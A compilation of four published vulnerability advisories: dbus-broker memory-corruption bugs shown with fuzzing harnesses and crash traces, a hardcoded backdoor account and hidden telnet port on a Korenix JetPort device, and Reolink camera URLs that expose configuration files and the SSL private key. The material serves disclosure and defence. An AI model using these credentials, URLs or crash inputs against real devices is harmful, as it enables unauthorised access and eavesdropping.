<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220602-0 ><br />=======================================================================<br /> title: Multiple Memory Corruption Vulnerabilities<br /> product: dbus-broker<br /> vulnerable version: dbus-broker-29<br /> fixed version: dbus-broker-31<br /> CVE number: CVE-2022-31212, CVE-2022-31213<br /> impact: medium<br /> homepage: https://github.com/bus1/dbus-broker<br /> found: 2022-01-14<br /> by: S. Robertz (Office Vienna)<br /> G. Hechenberger (Office Vienna)<br /> T. Weber (Office Vienna)<br /> T. Longin (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"The dbus-broker project is an implementation of a message bus as defined by<br />the D-Bus specification. Its aim is to provide high performance and<br />reliability, while keeping compatibility to the D-Bus reference implementation.<br />It is exclusively written for Linux systems, and makes use of many modern<br />features provided by recent linux kernel releases."<br /><br />Source: https://github.com/bus1/dbus-broker<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Stack-Buffer Over-Read (CVE-2022-31212)<br />Dbus-Broker depends on c-uitl/c-shquote to parse DBus service's Exec line.<br />c-shquote contains a stack buffer over-read if a malicious Exec line is<br />supplied.<br /><br />2) Null Pointer Dereference (CVE-2022-31213)<br />Multiple Null Pointer references can be found when supplying a malformed XML<br />config file.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Stack-Buffer Over-Read (CVE-2022-31212)<br />Following harness was used to fuzz the function c_shquote_parse_argv() as<br />it is used in src/launch/launcher.c of dbus-broker.<br /><br />------------------------------------------------------<br />#include <sys/types.h><br />#include <unistd.h><br />#include <stdio.h><br />#include <string.h><br />#include "c-shquote.h"<br /><br />#define SIZE_65KB 66560<br /><br />int main(int argc, char** argv) {<br /> char fuzz_buf[SIZE_65KB] = "";<br /> ssize_t fuzz_len = read(STDIN_FILENO, fuzz_buf, SIZE_65KB);<br /> char **out_argv;<br /> ssize_t out_argc;<br /> c_shquote_parse_argv(&out_argv, &out_argc, fuzz_buf, strlen(fuzz_buf));<br /> return 0;<br />}<br />----------------------------------------------------------<br /><br />Passing \xff to the STDIN of the testharness will cause following crash:<br /><br />----------------------------------------------------------<br />==21744==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff98c675bf at pc<br />0x558e29cacc02 bp 0x7fff98c67490 sp 0x7fff98c67488<br />READ of size 1 at 0x7fff98c675bf thread T0<br />#0 0x558e29cacc01 in c_shquote_strncspn c-shquote/src/c-shquote.c:119:21<br />#1 0x558e29caff15 in c_shquote_parse_next c-shquote/src/c-shquote.c:540:31<br />#2 0x558e29cb09c2 in c_shquote_parse_argv c-shquote/src/c-shquote.c:620:21<br />#3 0x558e29cab7e9 in c-shquote/src/argv_parser.c:23:2<br />#4 0x7f07953a8b24 in __libc_start_main (/usr/lib/libc.so.6+0x27b24)<br />#5 0x558e29bca15d in _start (c-shquote/src/harness_argv_parser+0x2015d)<br />Address 0x7fff98c675bf is located in stack of thread T0 at offset 287 in frame<br />#0 0x558e29cac54f in c_shquote_strncspn c-shquote/src/c-shquote.c:102<br />This frame has 1 object(s):<br />[32, 287) 'buffer' (line 103) <== Memory access at offset 287 overflows this variable<br />HINT: this may be a false positive if your program uses some custom stack unwind mechanism,<br />swapcontext or vfork<br />(longjmp and C++ exceptions *are* supported)<br />SUMMARY: AddressSanitizer: stack-buffer-overflow c-shquote/src/c-shquote.c:119:21 in<br />c_shquote_strncspn<br />Shadow bytes around the buggy address:<br />0x100073184e60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />0x100073184e70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />0x100073184e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />0x100073184e90: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00<br />0x100073184ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />=>0x100073184eb0: 00 00 00 00 00 00 00[07]f3 f3 f3 f3 f3 f3 f3 f3<br />0x100073184ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />0x100073184ed0: 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2 00 f2 f2 f2<br />0x100073184ee0: 00 f2 f2 f2 00 f3 f3 f3 00 00 00 00 00 00 00 00<br />0x100073184ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />0x100073184f00: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2<br />Shadow byte legend (one shadow byte represents 8 application bytes):<br />Addressable: 00<br />Partially addressable: 01 02 03 04 05 06 07<br />Heap left redzone: fa<br />Freed heap region: fd<br />Stack left redzone: f1<br />Stack mid redzone: f2<br />Stack right redzone:f3<br />Stack after return: f5<br />Stack use after scope: f8<br />Global redzone: f9<br />Global init order: f6<br />Poisoned by user: f7<br />Container overflow: fc<br />Array cookie: ac<br />Intra object redzone: bb<br />ASan internal: fe<br />Left alloca redzone: ca<br />Right alloca redzone: cb<br />==21744==ABORTING<br />------------------------------------------------------<br /><br />The error occurs in the functions c_shquote_strnspn() and c_shquote_strncspn().<br />Both allocate a buffer like this:<br /><br />bool buffer[UCHAR_MAX] = {};<br /><br />UCHAR_MAX is defined in the C standard header limits.h and equals 255. Thus,<br />array indexes of 0-254 can be addressed.<br /><br />However, the buffer will then be accessed like this:<br />buffer[(unsigned char)string[i]], where string is the commandline from STDIN<br />(or the EXEC line in case of dbus-broker services).<br />Passing \xff will thus read an out of bounds array element.<br /><br /><br />2) Null Pointer Dereference (CVE-2022-31213)<br />The dbus-broker config parser uses the expat library to parse XML files.<br /><br /><limit name="max_pendingonment"/> is a valid XML line. Thus expat will parse<br />it correctly. As no value is supplied in the statement, the<br />limit_max_pendingonment parameter will contain a Null pointer. DBus-broker does<br />not validate the result and tries to dereference the field, causing a crash.<br />Multiple other XML edge case can be found that cause the expat library to<br />correctly return a Null pointer, but are not handled correctly by the<br />dbus-broker.<br /><br />Including <limit name="max_pendingonment"/> causes following error message:<br />-------------------------<br />Program received signal SIGSEGV, Segmentation fault.<br />0x00007ffff782474a in ____strtoull_l_internal () from /lib64/libc.so.6<br />Missing separate debuginfos, use: yum debuginfo-install expat-2.2.5-4.el8.x86_64 libblkid-<br />2.32.1-28.el8.x86_64 libcap-2.26-5.el8.x86_64 libgcc-8.5.0-4.el8_5.x86_64 libmount-2.32.1-<br />28.el8.x86_64 libselinux-2.9-5.el8.x86_64 libuuid-2.32.1-28.el8.x86_64 pcre2-10.32-<br />2.el8.x86_64 sssd-client-2.5.2-2.el8_5.1.x86_64 systemd-libs-239-51.el8.x86_64<br />(gdb) bt<br />#0 0x00007ffff782474a in ____strtoull_l_internal () from /lib64/libc.so.6<br />#1 0x000000000040cf0a in util_strtou64 (valp=valp@entry=0x828bc8, string=0x0) at<br />../src/util/string.c:42<br />#2 0x0000000000408f07 in config_parser_end_fn (userdata=0x7fffffffdf58, name=0x82278c<br />"limit") at ../src/launch/config.c:1140<br />#3 0x00007ffff7ba100f in doContent () from /lib64/libexpat.so.1<br />#4 0x00007ffff7ba20c0 in contentProcessor () from /lib64/libexpat.so.1<br />#5 0x00007ffff7ba480c in XML_ParseBuffer () from /lib64/libexpat.so.1<br />#6 0x000000000040425f in config_parser_include (parser=0x7fffffffdf50, root=0x0,<br />node=<optimized out>, nss_cache=0x7fffffffdf30, dirwatch=0x8192a0) at<br />../src/launch/config.c:1289<br />#7 config_parser_read (parser=parser@entry=0x7fffffffdf50, rootp=rootp@entry=0x7fffffffdf28,<br />path=<optimized out>, nss_cache=nss_cache@entry=0x7fffffffdf30, dirwatch=0x8192a0) at<br />../src/launch/config.c:1347<br />#8 0x0000000000402c02 in main (argc=<optimized out>, argv=0x7fffffffe098) at<br />../src/launch/harness-config.c:24<br />-------------------------<br /><br /><br />Following harness was used:<br /><br />-------------------------<br />#include <c-list.h><br />#include <c-stdaux.h><br />#include <stdlib.h><br />#include "launch/config.h"<br />#include "launch/nss-cache.h"<br />#include "util/dirwatch.h"<br /><br />int main(int argc, char **argv) {<br />_c_cleanup_(config_parser_deinit) ConfigParser parser = CONFIG_PARSER_NULL(parser);<br />_c_cleanup_(config_root_freep) ConfigRoot *rootp = NULL;<br />_c_cleanup_(nss_cache_deinit) NSSCache nss_cache = NSS_CACHE_INIT;<br />_c_cleanup_(dirwatch_freep) Dirwatch *dirwatch = NULL;<br />int r;<br />r = dirwatch_new(&dirwatch);<br />config_parser_init(&parser);<br />r = config_parser_read(&parser, &rootp, argv[1], &nss_cache, dirwatch);<br />return 0;<br />}<br />-------------------------<br /><br /><br />Following config file will cause another error:<br />-------------------------<br />00000000: 3c21 2d2d 202d 2d3e 0a0a 3c21 444f 4354 <!-- -->..<!DOCT<br />00000010: 5950 4520 6720 5055 424c 4943 2022 2d2f YPE g PUBLIC "-/<br />00000020: 4e22 0a20 2268 7474 223e 0a3c 6275 7363 N". "htt">.<busc<br />00000030: 6f6e 6669 673e 0a0a 203c 7479 7065 3e73 onfig>.. <type>s<br />00000040: 643c 2f74 7970 653e 3c66 6f72 6b2f 3e0a d</type><fork/>.<br />00000050: 203c 7374 616e 6461 7264 5f73 7973 e803 <standard_sys..<br />00000060: 6d5f 7365 7276 6963 6564 6972 732f 3e0a m_servicedirs/>.<br />00000070: 203c 7365 7276 6963 6564 6972 2072 6563 <servicedir rec<br />00000080: 6569 7665 5f74 7970 653d 2265 7272 6f72 eive_type="error<br />00000090: 222f 3e0a 3c61 6c6c 6f77 2072 6563 6569 "/>.<allow recei<br />000000a0: 7665 5f74 7970 653d 2273 6967 6e61 6c22 ve_type="signal"<br />000000b0: 2f3e 2d3e 203c 616c 6c6f 7720 7365 6e64 />-> <allow send<br />000000c0: 5f64 6573 7469 6e61 7469 6f6e 3d22 220a _destination="".<br />000000d0: 2020 2073 656e 645f 696e 7465 7266 6163 send_interfac<br />000000e0: 653d 2222 202f 3e0a 3c61 6c6c 6f77 2073 e="" />.<allow s<br />000000f0: 656e 645f 6465 7374 696e 617d 696f 6e3d end_destina}ion=<br />00000100: 2222 0a20 2020 7365 6e64 5f69 6e74 6572 "". send_inter<br />00000110: 6661 6365 3d22 6f72 6522 2f3e 203c 212d face="ore"/> <!-<br />00000120: 2d20 2d2d 3e20 3c64 656e 7920 7365 6e64 - --> <deny send<br />00000130: 5f64 6573 74 _dest<br />-------------------------<br /><br />The error is following:<br />-------------------------<br />id:000047,sig:11,src:000356+000302,time:4820049,execs:17106488,op:splice,rep:4<br />Unknown element in /fuzzing_Data/dbus-broker-config/out/harness-config2--<br />/crashes/id:000047,sig:11,src:000356+000302,time:4820049,execs:17106488,op:splice,rep:4 +8:<br />standard_sysm_servicedirs<br />Unknown attribute in /fuzzing_Data/dbus-broker-config/out/harness-config2--<br />/crashes/id:000047,sig:11,src:000356+000302,time:4820049,execs:17106488,op:splice,rep:4 +9:<br />receive_type="error"<br />Program received signal SIGSEGV, Segmentation fault.<br />0x00007ffff789dc95 in __strlen_avx2 () from /lib64/libc.so.6<br />#0 0x00007ffff789dc95 in __strlen_avx2 () from /lib64/libc.so.6<br />#1 0x00007ffff78714e2 in strdup () from /lib64/libc.so.6<br />#2 0x0000000000408e96 in config_parser_end_fn (userdata=0x7fffffffdf48, name=0x81b45c<br />"servicedir") at ../src/launch/config.c:1130<br />#3 0x00007ffff7ba100f in doContent () from /lib64/libexpat.so.1<br />#4 0x00007ffff7ba20c0 in contentProcessor () from /lib64/libexpat.so.1<br />#5 0x00007ffff7b9fb6b in doProlog () from /lib64/libexpat.so.1<br />#6 0x00007ffff7ba0a5f in prologProcessor () from /lib64/libexpat.so.1<br />#7 0x00007ffff7ba480c in XML_ParseBuffer () from /lib64/libexpat.so.1<br />#8 0x000000000040425f in config_parser_include (parser=0x7fffffffdf40, root=0x0,<br />node=<optimized out>, nss_cache=0x7fffffffdf20, dirwatch=0x8192a0) at<br />../src/launch/config.c:1289<br />#9 config_parser_read (parser=parser@entry=0x7fffffffdf40, rootp=rootp@entry=0x7fffffffdf18,<br />path=<optimized out>, nss_cache=nss_cache@entry=0x7fffffffdf20, dirwatch=0x8192a0) at<br />../src/launch/config.c:1347<br />#10 0x0000000000402c02 in main (argc=<optimized out>, argv=0x7fffffffe088) at<br />../src/launch/harness-config.c:24<br />-------------------------<br /><br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The Git Master branch (dbus-broker-29) has been tested and found to be<br />vulnerable (tested at commit 727bee57cd3e3b5806eb8599abbdd49984b75732).<br /><br />Furthermore, it also contains the vulnerable c-shquote library (tested<br />at commit 83ccc2893385fcca1424b188f0f6c45a62f2b38d).<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-04-01: Contacting vendor email.<br />2022-04-04: Sending advisory via unencrypted email.<br />2022-04-19: Bugs are fixed. New version will be released 2022-04-20.<br />2022-05-10: dbus-broker-30 released.<br />2022-05-16: dbus-broker-31 released with further fixes.<br />2022-06-02: Release of security advisory.<br /><br /><br />Solution:<br />---------<br />Update to the latest version. The vendor provides an updated version v30.<br />v31 is available now which should be used as other introduced bugs have been<br />fixed there:<br /><br />https://github.com/bus1/dbus-broker/releases/tag/v31<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF S. Robertz, G. Hechenberger, T. Weber, T. Longin / @2022<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220531-0 ><br />=======================================================================<br /> title: Backdoor account<br /> product: Korenix JetPort 5601V3<br /> vulnerable version: Firmware version 1.0<br /> fixed version: None<br /> CVE number: CVE-2020-12501<br /> impact: High<br /> homepage: https://www.korenix.com/<br /> found: 2020-04-06<br /> by: T. Weber (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Korenix Technology, a Beijer group company within the Industrial Communication<br />business area, is a global leading manufacturer providing innovative, market-<br />oriented, value-focused Industrial Wired and Wireless Networking Solutions.<br />With decades of experiences in the industry, we have developed various product<br />lines [...].<br /><br />Our products are mainly applied in SMART industries: Surveillance, Machine-to-<br />Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer<br />base covers different Sales channels, including end-customers, OEMs, system<br />integrators, and brand label partners. [...]"<br /><br />Source: https://www.korenix.com/en/about/index.aspx?kind=3<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor stated that they "will not remove the hardcoded backdoor<br />account as it is needed for customer support and it can't be cracked in a reasonable<br />amount of time."<br /><br /><br />SEC Consult recommends not to use those devices in production environments and<br />to perform a thorough security review conducted by security professionals to<br />identify and resolve potential further critical security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Backdoor Accounts (CVE-2020-12501)<br />Multiple different backdoor accounts were found during quick security checks<br />of different firmware files. One backdoor account was tested on a later bought<br />device to verify this specific finding. A telnet service is running on the<br />device by default. This increases the risk of exploitation on the local network.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Backdoor Accounts (CVE-2020-12501)<br />The following account is available on at least one JetPort device of Korenix.<br />There might be more affected devices across this vendor. Westermo and Comtrol<br />devices may be affected too.<br /><br /> * User "superrd", present on:<br /> - JetPort 5601V3<br /> More devices may be affected.<br /><br />Two other users are present on the system according to "/etc/passwd". An<br />additional telnet-daemon is listening on port 19999.<br /><br />root:<no password><br />superrd:<not cracked><br />admin:admin<br /><br /><br />By inspecting "/etc/passwd", the only user that is allowed to login<br />to the device is "superrd":<br /><br />root::0:0:root:/root:/bin/false<br />superrd:$1$<redacted>:0:0::/root:/bin/sh<br />admin:$1$$CoERg7ynjYLsj2j4glJ34.:502:502::/:/bin/true<br /><br /><br />The listener has been identified by using "ps" and "netcat":<br /># ps<br /> PID Uid VmSize Stat Command<br /> 1 root 1452 S init [3]<br />[...]<br /> 253 root 1780 S /usr/bin/ser2net -p 600 -c /tmp/com2ip.conf<br /> 254 root 288 S /usr/sbin/telnetd -p 19999<br /> 289 root 788 S /usr/bin/dropbear<br /> 297 root 1916 S /usr/bin/thttpd -C /etc/thttpd.conf -cert /etc/thttpd<br /><br /># netstat -tulen<br />Active Internet connections (only servers)<br />Proto Recv-Q Send-Q Local Address Foreign Address State<br />[...]<br />tcp 0 0 0.0.0.0:19999 0.0.0.0:* LISTEN<br />[...]<br /><br />The vulnerability has been manually verified on an emulated device<br />by using the MEDUSA scalable firmware runtime.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following product / firmware version has been tested:<br />* Korenix JetPort 5601V3 / 1.0<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2020-04-14: Contacting CERT@VDE through info@cert.vde.com and requested support<br /> for the disclosure process due to the involvement of multiple<br /> vendors.<br />2020-04-15: Security contact responded, that the products were developed by<br /> Korenix Technologies.<br />2020-04-30: Security contact informed us, that some vulnerabilities were<br /> confirmed by the vendor.<br />2020-07-30: Call with Pepperl+Fuchs contact. Contact stated that the<br /> vulnerabilities were reported to Korenix.<br />2020-09-29: Call with Pepperl+Fuchs and CERT@VDE regarding status.<br /> Pepperl+Fuchs stated that they just have a sales contact from<br /> Korenix.<br />2020-10-05: Coordinated release of SA-20201005-0.<br />2020-10-05: Call with the helpdesk of Beijer Electronics AB. The contact stated<br /> that no case regarding vulnerabilities were opened and created one.<br /> The product owners of Westermo, Korenix and Beijer Electronics were<br /> informed via this inquiry. Set disclosure date to 2020-11-25.<br />2020-10-06: Restarted the whole responsible disclosure process by sending a<br /> request to the new security contact cs@beijerelectronics.com.<br />2020-10-07: Received an email from a Korenix representative which offered to<br /> answer questions about product security. Started responsible<br /> disclosure by requesting email certificate or whether plaintext can be<br /> used. Referred to the request to cs@beijerelectronics.com.<br /> No answer.<br />2020-11-11: Asked the representatives of Korenix and Beijer regarding the<br /> status.<br /> No answer.<br />2020-11-25: Phone call with security manager of Beijer. Sent advisories via<br /> encrypted archive to cs@beijerelectronics.com. Received<br /> confirmation of advisory receipt. Security manager told us that he<br /> can provide information regarding the timeline for the patches<br /> within the next two weeks.<br />2020-12-09: Asked for an update.<br />2020-12-18: Call with security manager of Beijer. Vendor presented initial<br /> analysis done by the affected companies.<br />2021-03-21: Security manager invited SEC Consult to have a status meeting.<br />2021-03-26: Agreed on an advisory split as other affected products will get<br /> patched later.<br />2021-04-12: Performed advisory split.<br />2021-05-26: Meeting regarding advisory publication. Agreed to release this<br /> advisory in Q4.<br />2021-06-01: Released related advisory SA-20210601-0.<br /><br />2021-06-24: Beijer Electronics contact informs us that he leaves the company<br /> today. Refers us to new contact in CC.<br /><br />2021-07-05: Follow-up meeting with new vendor contact regarding next steps.<br />2021-07-16: Contact from Beijer Electronics reached out to Korenix. Engineers<br /> from Korenix are still investigating the issues. JetWave 2311 went<br /> EoL, next status update in August 2021. JetPort will be fixed in<br /> Q1 2022.<br />2021-09-15: Asked for status update;<br />2021-09-20: Korenix will provide a time schedule for the patches by end of next<br /> week.<br />2021-09-28: Meeting regarding the schedule. Fixes will be available by end of<br /> the year for Korenix JetWave series.<br />2021-09-28: Update call with vendor; Fixes will be available in November.<br />2021-11-18: Contact had difficulties to get a response from Korenix. JetWave<br /> 2212G 1.8.0 has been released, other fixes will be released in<br /> December.<br />2021-11-22: Vendor provides all other fixed versions, which have already been<br /> put online.<br />2021-12-17: Performed another advisory split.<br />2021-12-20: Update call with vendor. Identified another possibly affected<br /> device (JetWave 3420). Investigation will be started from Korenix<br /> as soon as possible.<br />2021-12-28: Vendor has rolled out an update for the JetWave 3420 V3 firmware.<br />2022-01-17: Informed vendor about the advisory release within the next two<br /> weeks.<br />2022-01-19: Call with vendor; agreed that advisory can be published for<br /> JetWave series.<br />2022-01-24: Informed vendor about advisory release on 2022-01-31.<br />2022-01-31: Released related advisory SA-20220131-0.<br />2022-02-22: Vendor says, that fixes are estimated to be completed by end of<br /> February.<br />2022-03-29: Most issues from the related advisories (SA-20201005-0, SA-20210601-0)<br /> are not applicable according to the vendor, only the backdoor account<br /> exists in the JetPort series. The JetPort series will not go end of life.<br /><br /> The backdoor is needed in order to assist customers with problems and<br /> Korenix claims the password can't be cracked in a reasonable amount of time,<br /> hence it will not be fixed.<br /><br /> Security contact states that there is no point in waiting and we can<br /> release the security advisory.<br /><br />2022-04-05: Another call to clarify with security contact; Korenix will not remove<br /> the account as this issue is not considered as critical.<br />2022-05-18: Tried to re-send the advisory for final review which only contains the<br /> backdoor account information. Received auto-reply that our contact from<br /> Beijer Group (who did the coordination with Korenix) was no longer part<br /> of the company.<br />2022-05-31: Public release of security advisory.<br /><br /><br />Solution:<br />---------<br />None available. The vendor stated that they "will not remove the hardcoded backdoor<br />account as it is needed for customer support and it can't be cracked in a reasonable<br />amount of time."<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Thomas Weber / @2022<br /><br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Reolink E1 Zoom Camera<br />Vendor URL: https://reolink.com/product/e1-zoom/<br />Type: Exposure of Sensitive Information to an Unauthorized Actor [CWE-200]<br />Date found: 2021-08-26<br />Date published: 2022-06-01<br />CVSSv3 Score: 5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)<br />CVE: CVE-2021-40150<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Reolink E1 Zoom Camera 3.0.0.716 (latest) and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Meet new generation of Reolink E1 series. Advanced features - 5MP Super HD<br />& optical zoom are added into this compact camera. Plus two-way audio, remote<br />live view and more smart capacities help you connect with what you care. Be<br />closer to families and be away from worries.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The web server of the E1 Zoom camera through 3.0.0.716 discloses its configuration<br />via the /conf/ directory that is mapped to a publicly accessible path.<br /><br />An unauthenticated attacker can abuse this with network-level access to the<br />camera to download the entire NGINX/FastCGI configurations by querying, i.e.:<br /><br />http://[CAM-IP]/conf/nginx.conf<br />http://[CAM-IP]/conf/fastcgi.conf<br /><br />Etc.<br /><br /><br />6. RISK<br />=======<br />An unauthenticated attacker can download the webserver's configuration files<br />which might lead to sensitive information disclosure.<br /><br /><br />7. SOLUTION<br />===========<br />None.<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2021-08-26: Discovery of the vulnerability<br />2021-08-26: Sent notification to Reolink via their support channel<br />2021-08-26: Response from vendor asking for vulnerability details<br />2021-08-26: Sent all the vulnerability details<br />2021-08-31: Vendor is still looking into the issue<br />2021-09-03: Vendor states that the issue will be fixed with the next firmware update by the end of September.<br />2021-10-01: Since no firmware has been released, we've sent another notification<br />2021-10-02: Vendor states that the new firmware is delayed<br />2022-02-01: Since there is still fix, sent another notification<br />2022-02-02: Vendor states that the firmware with the fix hasn't been released yet.<br />2022-03-03: Since there is still fix, sent another notification<br />2022-03-12: Vendor states they're still working on the issue (internal update awaits testing)<br />2022-05-24: Since there is still fix, sent another notification<br />2022-05-24: Vendor states that the update still hasn't been released yet.<br />2022-06-01: Almost a year should be enough to fix this. Public disclosure.<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Reolink E1 Zoom Camera<br />Vendor URL: https://reolink.com/product/e1-zoom/<br />Type: Exposure of Sensitive Information to an Unauthorized Actor [CWE-200]<br />Date found: 2021-08-26<br />Date published: 2022-06-01<br />CVSSv3 Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)<br />CVE: CVE-2021-40149<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Reolink E1 Zoom Camera 3.0.0.716 (latest) and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Meet new generation of Reolink E1 series. Advanced features - 5MP Super<br />HD & optical zoom are added into this compact camera. Plus two-way audio,<br />remote live view and more smart capacities help you connect with what you<br />care. Be closer to families and be away from worries.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The web server of the E1 Zoom camera through 3.0.0.716 discloses its SSL private<br />key via the root web server directory.<br /><br />An unauthenticated attacker can abuse this with network-level access to the<br />camera to download the webserver's private SSL key by simply going to the<br />following URL:<br /><br />http://[CAM-IP]/self.key<br /><br /><br />6. RISK<br />=======<br />An unauthenticated attacker can download the webserver's SSL private key and<br />thereby attack the encrypted network traffic to and from the camera, which might<br />lead to the disclosure of the administrative access credentials and other<br />sensitive information.<br /><br /><br />7. SOLUTION<br />===========<br />None.<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2021-08-26: Discovery of the vulnerability<br />2021-08-26: Sent notification to Reolink via their support channel<br />2021-08-26: Response from vendor asking for vulnerability details<br />2021-08-26: Sent all the vulnerability details<br />2021-08-31: Vendor is still looking into the issue<br />2021-09-03: Vendor states that the issue will be fixed by the end of September.<br />2021-10-01: Since no firmware has been released, we've sent another notification<br />2021-10-02: Vendor states that the new firmware is delayed<br />2022-02-01: Since there is still fix, sent another notification<br />2022-02-02: Vendor states that the firmware with the fix hasn't been released yet.<br />2022-03-03: Since there is still fix, sent another notification<br />2022-03-12: Vendor states they're still working on the issue (internal update awaits testing)<br />2022-05-24: Since there is still fix, sent another notification<br />2022-05-24: Vendor states that the update still hasn't been released yet.<br />2022-06-01: Almost a year should be enough to fix this. Public disclosure.<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /><br /></code></pre>
